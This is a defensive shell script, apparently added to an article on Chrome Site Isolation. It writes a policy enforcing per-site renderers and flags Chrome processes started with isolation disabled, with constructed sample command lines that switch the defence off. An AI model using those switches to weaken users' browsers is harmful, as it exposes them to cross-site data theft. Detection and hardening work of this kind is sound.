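# Added example (not from the article or Chromium): two fleet-side checks
# for the Site Isolation defence discussed above.
#  1) render the managed-policy file that forces full site isolation on
#     desktop Chrome and isolates named origins, and
#  2) spot a Chrome process launched with isolation switched off.
# Policy path and the origins in IsolateOrigins are assumptions.
POLICY_DIR="/etc/opt/chrome/policies/managed"     # Linux Chrome policy dir
POLICY_FILE="$POLICY_DIR/site-isolation.json"

# isolation_policy_json: print the policy document. SitePerProcess is the
# desktop "one renderer per site" switch; IsolateOrigins lists origins that
# must get their own renderer even where isolation is otherwise partial.
isolation_policy_json() {
    cat <<'EOF'
{
  "SitePerProcess": true,
  "IsolateOrigins": "https://login.example.com,https://mail.example.com"
}
EOF
}

# install_isolation_policy: write the policy where Chrome reads it (root).
install_isolation_policy() {
    mkdir -p "$POLICY_DIR" && isolation_policy_json > "$POLICY_FILE"
}

# isolation_disabled_in_cmdline <chrome command line>: returns 0 when the
# process was started with a switch that turns Site Isolation off.
isolation_disabled_in_cmdline() {
    case " $1 " in
        *" --disable-site-isolation-trials "*) return 0 ;;
        *" --disable-features="*) ;;            # inspect the feature list below
        *) return 1 ;;
    esac
    # --disable-features=A,B,... : either of these names disables isolation
    features="$(printf '%s' "$1" | sed -n 's/.*--disable-features=\([^ ]*\).*/\1/p')"
    case ",$features," in
        *,site-per-process,*|*,IsolateOrigins,*) return 0 ;;
        *) return 1 ;;
    esac
}

# scan_running_chrome: apply the check to live processes (quiet without ps).
scan_running_chrome() {
    ps -eo args 2>/dev/null | grep -E '^(/[^ ]*/)?(google-)?chrom(e|ium)' | while IFS= read -r line; do
        if isolation_disabled_in_cmdline "$line"; then
            echo "site isolation disabled: $line"
        fi
    done
}

# Constructed sample command lines (not captured from a real host):
for cmd in \
    "/opt/google/chrome/chrome --user-data-dir=/tmp/prof --disable-site-isolation-trials" \
    "chromium --headless --disable-features=IsolateOrigins,site-per-process" \
    "/opt/google/chrome/chrome --site-per-process"; do
    if isolation_disabled_in_cmdline "$cmd"; then
        echo "DISABLED: $cmd"
    else
        echo "ok:       $cmd"
    fi
done

echo "policy to deploy under $POLICY_FILE:"
isolation_policy_json
scan_running_chrome
```

After deploying the policy, `chrome://policy` should list `SitePerProcess` as applied and `chrome://process-internals` should show one renderer per site; the Android equivalents are the `SitePerProcessAndroid` and `IsolateOriginsAndroid` policies.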

Google takes Site Isolation a notch higher in Chrome 77 against attacks